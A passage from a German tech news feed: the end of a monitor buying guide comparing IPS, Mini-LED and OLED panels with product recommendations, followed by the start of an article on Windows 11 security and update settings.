<p>Der Effekt: Wo das Bild besonders dunkel sein soll, können die entsprechenden Dimmzonen stark heruntergeregelt oder sogar abgeschaltet werden. Das sorgt für fantastische Kontraste und eine beeindruckende Spitzenhelligkeit, die echtes, blendendes HDR ermöglicht. </p>



<p><strong>Der Nachteil</strong>: Um helle Objekte auf dunklem Grund (wie den Mauszeiger) kann ein minimaler Lichtkranz entstehen (<strong>Blooming</strong>).</p>



<h3 class="wp-block-heading">Für wen eignen sich Mini-LED-Monitore?</h3>



<p>Besonders in hellen Räumen spielt Mini-LED seine Stärken aus. Die Technik eignet sich außerdem für ambitionierte Gamer und Film-Enthusiasten, die spektakuläre HDR-Effekte ohne Kompromisse bei der Helligkeit erleben möchten.</p>



<h2 class="wp-block-heading">Produktempfehlung: AOC Gaming Q27G3XMN</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51eddec2324"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/AOC-Gaming-Q27G3XMN.jpg?quality=50&amp;strip=all&amp;w=1100" alt="AOC Gaming Q27G3XMN" class="wp-image-3168006" width="1100" height="1199" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">AOC </p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://www.amazon.de/dp/B0CNRPGQBG?tag=pcwelt.de-21&amp;ascsubtag=4-0-3167989-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-3167989-7-0-0-0-0">AOC Gaming Q27G3XMN bei Amazon ansehen</a></div>


<p>Preis: 259 Euro</p>



<p><strong>Technik-Specs:</strong></p>



<ul class="wp-block-list">
<li><strong>Bilddiagonale &amp; Format:</strong> 27 Zoll (68,6 cm), Seitenverhältnis 16:9, mattes Display</li>



<li><strong>Auflösung &amp; Panel-Typ:</strong> QHD (2.560 × 1.440 Pixel), VA-Panel</li>



<li><strong>Hintergrundbeleuchtung:</strong> Mini-LED-Technologie mit 336 lokalen Dimmzonen (Local Dimming)</li>



<li><strong>Kontrast &amp; Helligkeit:</strong> Statischer Kontrast 3.000:1, maximale Spitzenhelligkeit 1.000 Nits</li>



<li><strong>HDR-Zertifizierung:</strong> VESA Certified DisplayHDR 1000</li>



<li><strong>Bildwiederholrate &amp; Reaktionszeit:</strong> 180 Hz nativ, 1 ms</li>



<li><strong>Synchronisation:</strong> AMD FreeSync Premium Pro</li>



<li><strong>Ergonomie-Funktionen:</strong> 130 mm höhenverstellbar, Pivot-Funktion (90-Grad-Drehung), abnehmbarer Standfuß, VESA-Wandhalterung kompatibel (100 x 100 mm)</li>



<li><strong>Zusatzfunktionen:</strong> Flicker-Free-Hintergrundbeleuchtung, Blaulichtreduktion (Low Blue Light), herstellereigene Konfigurationssoftware (AOC G-Menu)</li>



<li><strong>Anschlüsse:</strong> 1 × DisplayPort 1.4, 2 × HDMI 2.0, 1 × 3,5-mm-Klinkenanschluss (Kopfhörer)</li>



<li><strong>Lieferumfang &amp; Service:</strong> Monitor, Stromkabel, HDMI-Kabel, DisplayPort-Kabel, Treiber-CD, 3 Jahre Herstellergarantie</li>
</ul>



<p>Der <a href="https://www.amazon.de/dp/B0CNRPGQBG?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">AOC Gaming Q27G3XMN</a> platziert sich als vergleichsweise günstiger Einstieg in die Mini-LED-Technologie. Durch die VESA-Zertifizierung nach dem DisplayHDR-1000-Standard liefert das Panel eine deutlich höhere Spitzenhelligkeit und Dynamik als klassische IPS-Monitore ohne lokales Dimming. 336 separate Dimmzonen ermöglichen eine selektive Abschaltung der Hintergrundbeleuchtung, womit der Kontrast bei der Darstellung von HDR-Inhalten im Vergleich zu herkömmlichen Edge-LED-Modellen sichtbar steigt.</p>



<h2 class="wp-block-heading">3. OLED-Monitore: Das visuelle Nonplusultra mit perfektem Schwarz</h2>



<p>OLED-Monitore sind der Traum vieler Gamer und <a href="https://www.pcwelt.de/article/3149575/smart-tv-heimkino-upgrades.html" target="_blank" rel="noreferrer noopener">Heimkino-Enthusiasten</a>. Weil hier jedes Pixel als winziges, selbstleuchtendes Element agiert, benötigt OLED keine Hintergrundbeleuchtung. Wird ein Pixel abgeschaltet, ist es absolut schwarz. Das resultiert in unendlichem Kontrast und einer Bildtiefe, die keine andere Technik erreicht. </p>



<p>Hinzu kommen Reaktionszeiten nahe dem theoretischen Nullpunkt. Allerdings erreichen OLED-Monitore bei großflächigen Bildinhalten meist nicht die Dauerhelligkeit hochwertiger Mini-LED-Displays. Bei statischen Inhalten (wie Excel-Tabellen oder Taskleisten) besteht auf Dauer zudem ein theoretisches Risiko für Einbrenneffekte (<strong>Burn-In</strong>). Solche Monitore setzen deshalb auf verschiedene Schutzmechanismen wie Pixel-Refresh, Pixel-Shift oder automatische Helligkeitsanpassungen.</p>



<h3 class="wp-block-heading">Für wen eignet sich die OLED-Technik?</h3>



<p>Für Hardcore-Gamer, Cineasten und Nutzer, die primär in abgedunkelten Räumen arbeiten oder spielen und die absolut beste Bildqualität suchen.</p>



<h2 class="wp-block-heading">Produktempfehlung: Asus ROG Swift OLED PG27AQDM</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51eddec3099"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/ASUS-ROG-Swift-OLED-PG27AQDM-27-Zoll-WQHD-Gaming-Monitor.jpg?quality=50&amp;strip=all&amp;w=1200" alt="ASUS ROG Swift OLED PG27AQDM - 27 Zoll WQHD Gaming Monitor" class="wp-image-3168008" width="1200" height="1013" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Asus</p></div>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn shopping-cart-icon-white link-6-button" href="https://www.amazon.de/dp/B0BXY85B9F?tag=pcwelt.de-21&amp;ascsubtag=4-0-3167989-7-0-0-0-0&amp;ascsubtag=rss" target="_blank" rel="nofollow" data-vars-link-position="CTA Button" data-domain-name="amazon" data-subtag="4-0-3167989-7-0-0-0-0">Asus ROG Swift OLED PG27AQDM bei Amazon ansehen</a></div>


<p>Preis: 600 Euro</p>



<p><strong>Technik-Specs:</strong></p>



<ul class="wp-block-list">
<li><strong>Bilddiagonale &amp; Format:</strong> 26,5 Zoll (67,3 cm), Seitenverhältnis 16:9, Anti-Glare-Oberfläche (reflexionsarm)</li>



<li><strong>Auflösung &amp; Panel-Typ:</strong> WQHD (2.560 × 1.440 Pixel), 10-Bit-OLED</li>



<li><strong>Farbraum &amp; Farbtreue:</strong> 99 % DCI-P3-Farbraumabdeckung, sehr hohe Farbgenauigkeit (Delta E &lt; 2)</li>



<li><strong>Helligkeit:</strong> Maximale Spitzenhelligkeit von 1.000 Nits, optionale Funktion für gleichmäßige Helligkeitsbegrenzung</li>



<li><strong>Bildwiederholrate &amp; Reaktionszeit:</strong> 240 Hz nativ, 0,03 ms</li>



<li><strong>Synchronisation &amp; Input:</strong> Nvidia G-Sync Compatible, AMD FreeSync Premium, GameFast Input (Eingabeverzögerungs-Reduzierung)</li>



<li><strong>Panel-Schutz (Wärmemanagement):</strong> Integrierter, angepasster Kühlkörper (Heatsink), softwareseitige Spannungsoptimierung zur Verringerung des Burn-In-Risikos</li>



<li><strong>Ergonomie &amp; Bedienung:</strong> Standfuß mit flexiblen Verstellmöglichkeiten, Monitoreinstellungen über Windows-Software per Maus steuerbar</li>



<li><strong>Anschlüsse:</strong> DisplayPort 1.4, HDMI (Version herstellerseitig nicht spezifiziert), integrierter USB-Hub</li>
</ul>



<p>Der <a href="https://www.amazon.de/dp/B0BXY85B9F?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Asus ROG Swift OLED PG27AQDM</a> setzt auf die typischen Stärken der OLED-Technologie: konstruktionsbedingt perfektes Schwarz und extrem niedrige Reaktionszeiten von 0,03 Millisekunden. </p>



<p>In Kombination mit der hohen Bildwiederholrate von 240 Hertz eignet sich das Modell primär für schnelle, kompetitive Spiele. Um der typischen OLED-Problematik des Panel-Einbrennens (Burn-In) entgegenzuwirken, verbaut der Hersteller einen passiven Kühlkörper und nutzt eine softwareseitige Spannungsoptimierung, die die thermische Belastung der organischen Pixel im Betrieb reduzieren soll.</p>



<h2 class="wp-block-heading">Die drei Technologien im Vergleich</h2>



<p>Hier sehen Sie die Stärken und Schwächen im direkten Schlagabtausch, um die richtige Kaufentscheidung für Ihren Arbeitsplatz zu treffen:</p>



<figure class="wp-block-table is-style-stripes"><table class="has-fixed-layout"><tbody><tr><td><strong>Kriterium</strong></td><td><strong>IPS-Panel</strong></td><td><strong>Mini-LED</strong></td><td><strong>OLED</strong></td></tr><tr><td><strong>Schwarzwert &amp; Kontrast</strong></td><td>Befriedigend (Grauschleier)</td><td>Sehr gut (leichtes Blooming)</td><td>Perfekt (Unendlicher Kontrast)</td></tr><tr><td><strong>Spitzenhelligkeit</strong></td><td>Gut (ca. 300–400 Nits)</td><td>Brillant (1.000+ Nits)</td><td>Sehr gut (ca. 400–1.000 Nits)</td></tr><tr><td><strong>Reaktionszeit</strong></td><td>Schnell (1–4 ms)</td><td>Schnell (1–4 ms)</td><td>Extrem schnell (0,03 ms)</td></tr><tr><td><strong>Blickwinkelstabilität</strong></td><td>Sehr hoch</td><td>Hoch</td><td>Extrem hoch</td></tr><tr><td><strong>Risiko für statische Inhalte</strong></td><td>Keines</td><td>Keines</td><td>Geringes Risiko (Burn-In-Schutz sinnvoll)</td></tr><tr><td><strong>Preis-Leistungs-Verhältnis</strong></td><td>Gut</td><td>Gut</td><td>Gehobene Preisklasse</td></tr></tbody></table></figure>



<h2 class="wp-block-heading">Software-Ergänzungskit: Mehr Komfort im Monitor-Alltag</h2>



<p>Ein Hardware-Upgrade ist nur die halbe Miete. Mit diesen drei kostenlosen Software-Tools holen Sie noch mehr aus Ihrem neuen Bildschirm heraus:</p>



<ul class="wp-block-list">
<li><a href="https://learn.microsoft.com/de-de/windows/powertoys/install?tabs=gh%2Cextract-094" target="_blank" rel="noreferrer noopener"><strong>Microsoft PowerToys (FancyZones)</strong></a><strong>:</strong> Gerade bei großen oder ultra weiten Monitoren ist das Standard-Fensterlayout von Windows überfordert. Mit dem Modul <strong>FancyZones</strong> unterteilen Sie Ihren Bildschirm in feste, frei definierbare Raster, in die Sie Fenster mit gedrückter Shift-Taste blitzschnell einrasten lassen. Ein Must-Have für Multitasking.</li>



<li><a href="https://twinkletray.com/" target="_blank" rel="noreferrer noopener"><strong>Twinkle Tray</strong></a><strong>:</strong> Wer die Helligkeit seines Monitors nicht mühsam über die fummeligen Tasten direkt am Gehäuse verstellen möchte, steuert mit diesem Tool die Monitorhelligkeit ganz bequem per Mausrad oder Tastenkombination direkt aus der Windows-Taskleiste heraus.</li>



<li><a href="https://apps.microsoft.com/detail/xp8jk4hzbvf435?hl=de-DE&amp;gl=DE" target="_blank" rel="noreferrer noopener"><strong>Auto Dark Mode:</strong></a> Um bei OLED-Displays dauerhaft helle Oberflächen zu reduzieren und am Abend die Augen zu entlasten, schaltet dieses Tool Windows sowie kompatible Apps und Websites nach Sonnenuntergang automatisch in den dunklen Design-Modus.</li>
</ul>



<h2 class="wp-block-heading">Fazit: Welcher Monitor-Typ sind Sie?</h2>



<p>Das perfekte Monitor-Upgrade richtet sich immer nach Ihrem Nutzungsverhalten im Alltag: Wer einen treuen, langlebigen Partner sucht, der acht Stunden am Tag ohne Murren Office-Dokumente anzeigt und beim Budget nicht schmerzt, greift zum <strong>IPS-Klassiker</strong>. </p>



<p>Wer sich hingegen von spektakulären HDR-Effekten in Filmen und Spielen begeistern lassen will oder tagsüber in hellen Räumen arbeitet, findet im <strong>Mini-LED-Monitor</strong> einen hell leuchtenden Allrounder. Wenn kompromisslose Bildqualität, perfektes Schwarz und die schnellsten Reaktionszeiten beim Gaming im Vordergrund stehen, führt kein Weg am <strong>OLED-Panel</strong> vorbei – sofern das nötige Kleingeld vorhanden ist.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sicher und schnell: Diese Windows-Einstellungen sollten Sie sofort anpassen]]></title>
<description><![CDATA[Nach der Installation von oder dem Upgrade auf Windows 11 sollten Sie einige Einstellungen überprüfen und an Ihre Anforderungen anpassen – oder an Empfehlungen von Experten, um die Sicherheit des Betriebssystems zu verbessern. Wir zeigen in diesem Beitrag die wichtigsten Anpassungen, die mit weni...]]></description>
<link>https://tsecurity.de/de/3661389/windows-tipps/sicher-und-schnell-diese-windows-einstellungen-sollten-sie-sofort-anpassen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661389/windows-tipps/sicher-und-schnell-diese-windows-einstellungen-sollten-sie-sofort-anpassen/</guid>
<pubDate>Sat, 11 Jul 2026 08:41:08 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Nach der Installation von oder dem Upgrade auf <a href="https://software.pcwelt.de/offer/windows_11_home/43835?x-source=rss" target="_blank" rel="noreferrer noopener">Windows 11 </a>sollten Sie einige Einstellungen überprüfen und an Ihre Anforderungen anpassen – oder an Empfehlungen von Experten, um die Sicherheit des Betriebssystems zu verbessern. Wir zeigen in diesem Beitrag die wichtigsten Anpassungen, die mit wenigen Klicks die Sicherheit maximieren und das Betriebssystem verbessern.</p>



<p><em>Übrigens: Sollten Sie Windows 11 Home im Einsatz haben, dann entgehen Ihnen die vielen Vorteile der Pro-Version, die wir Ihnen <a href="https://www.pcwelt.de/article/1203134/windows-11-unterschiede-zwischen-home-und-pro-version.html" target="_blank" rel="noreferrer noopener">hier vorstellen.</a> Im PC-WELT Software-Shop ist das Windows-11-Upgrade <a href="https://software.pcwelt.de/offer/windows_11_professional_upgrade/44487?x-source=rss" target="_blank" rel="noreferrer noopener">für günstige 59,99 Euro statt 145 Euro</a> erhältlich.</em></p>



<h2 class="wp-block-heading toc">Explorer anpassen</h2>



<p>Standardmäßig blendet Windows seit Jahren bekannte Dateiendungen aus. Das ist zunächst störend, weil Sie dadurch den korrekten Dateinamen nicht vollständig angezeigt kommen. Dazu kommt die Sicherheitsgefahr. So wird etwa die Datei “wichtiges-dokument.doc.exe” in diesem Fall als “wichtiges-dokument.doc! angezeigt, weil Windows einfach die Dateiendung “exe” ausblendet. </p>



<p>Aus einer ausführbaren Datei, etwa Malware/Ransomware, wird dadurch auf den ersten Blick ein unverdächtiges Worddokument. Das Problem können Sie schnell umgehen, indem Sie im Explorer auf “Anzeigen → Einblenden → Dateinamenerweiterungen” aktivieren.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704967c"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/dateierweiterungen-einblenden.png" alt="Dateinamenerweiterungen" class="wp-image-2279514" width="847" height="603" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Sie finden die Einstellung in anderen Windows-Versionen auch in den Ordneroptionen auf der Registerkarte “Ansicht” bei “Erweiterungen bei bekannten Dateitypen ausblenden”. In diesem Fall müssen Sie die Option deaktivieren.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e57049ecd"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/dateierweiterungen-einblenden-02.png" alt="Ansicht-Explorer" class="wp-image-2279516" width="377" height="483" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Bei den Ordneroptionen können Sie dann auch gleich auf der Registerkarte “Allgemein” bei “Datei-Explorer öffnen für” die Option “Dieser PC” auswählen. In diesem Fall startet der Explorer mit der Ansicht der Laufwerke, nicht mit der selten gewünschten “Start-Ansicht”. Die Start-Ansicht können Sie in diesem Fall auch mit einem einzelnen Klick auf “Start” links oben öffnen.</p>



<h2 class="wp-block-heading toc">Windows-Update anpassen</h2>



<p>Nach der Aktualisierung zu Windows 11 oder der Installation des Betriebssystems sollten Sie in den Einstellungen zunächst zu “Windows Update” wechseln. Generell sollten Sie zunächst sicherstellen, dass im oberen Bereich die Meldung “Sie sind auf dem neusten Stand erscheint”. Klicken Sie dennoch auf “Nach Updates suchen” und stellen Sie sicher, dass wirklich alle Updates installiert sind. Über diesen Weg aktualisiert Windows auch die Definitionsdateien des Malwareschutzes.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704a75a"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/windows-update-01.png" alt="Windows-Update" class="wp-image-2279518" width="1024" height="757" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Überdies kann es sinnvoll sein, die Option “Erhalten Sie die neuesten Updates, sobald sie verfügbar sind” zu aktivieren. Das stellt sicher, dass Ihr Windows-System Updates schneller erhält als andere Nutzer. Microsoft verteilt viele Aktualisierungen in Wellen. Aktivieren Sie diese Option, können Sie sich in den Wellen etwas vordrängeln.</p>



<p>Klicken Sie darüber hinaus noch auf “Erweiterte Optionen” und aktivieren Sie “Updates für andere Microsoft-Produkte erhalten”. Dadurch stellen Sie sicher, dass auch die anderen Produkte auf Ihrem PC immer aktuell sind.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704af0b"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/windows-update-02.png" alt="Windows-Updates anpassen" class="wp-image-2279519" width="1024" height="763" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>An dieser Stelle kann es auch sinnvoll sein bei “Nutzungszeit” festzulegen, wann Sie am PC arbeiten. Das stellt sicher, dass Windows nach der Installation von Updates nicht innerhalb dieser Zeit startet.</p>



<h2 class="wp-block-heading toc">Wichtig: Malware-Schutz</h2>



<p>Rufen Sie nach der Installation von Windows 11 die App “Windows-Sicherheit” aus dem Startmenü auf. Hier sollte bei allen Einstellungen ein grünes Icon mit einem Haken zu sehen sein. Ist das nicht der Fall, überprüfen Sie den Bereich, indem Sie auf das jeweilige Icon klicken.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704b62e"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/sicherheit-01.png" alt="Windows-Sicherheit-01" class="wp-image-2279521" width="922" height="777" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Bei “Gerätesicherheit” sollten Sie darauf achten, dass die Option “Speicher-Integrität” bei “Kernisolierung → Details zu Kernisolierung” aktiviert ist.  Das verhindert erfolgreiche Angriffe durch Malware. Lässt sich diese Option nicht deaktivieren, liegt das an einem veralteten und damit unsicheren Treiber.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704bcb8"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/kern-isolierung.png" alt="Aktivieren der Kern-Isolierung" class="wp-image-2279524" width="923" height="711" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Außerdem sollten Sie darauf achten, dass “Microsoft-Sperrliste gefährdeter Treiber” aktiviert ist. Dadurch lassen sich unsichere Treiber blockieren, über die Angreifer Malware auf dem System einschleusen können.</p>



<h2 class="wp-block-heading toc">Viren- und Bedrohungsschutz anpassen</h2>



<p>In der App Windows-Sicherheit sollten Sie nach der Installation noch zu “Viren- und Bedrohungsschutz” wechseln. Klicken Sie bei “Einstellungen für Viren- und Bedrohungsschutz” auf “Einstellungen verwalten” und achten Sie darauf, dass hier alle Optionen eingeschaltet sind, primär “Echtzeitschutz”, “Cloudbasierter-Schutz” und “Automatische Übermittlung von Beispielen”.</p>


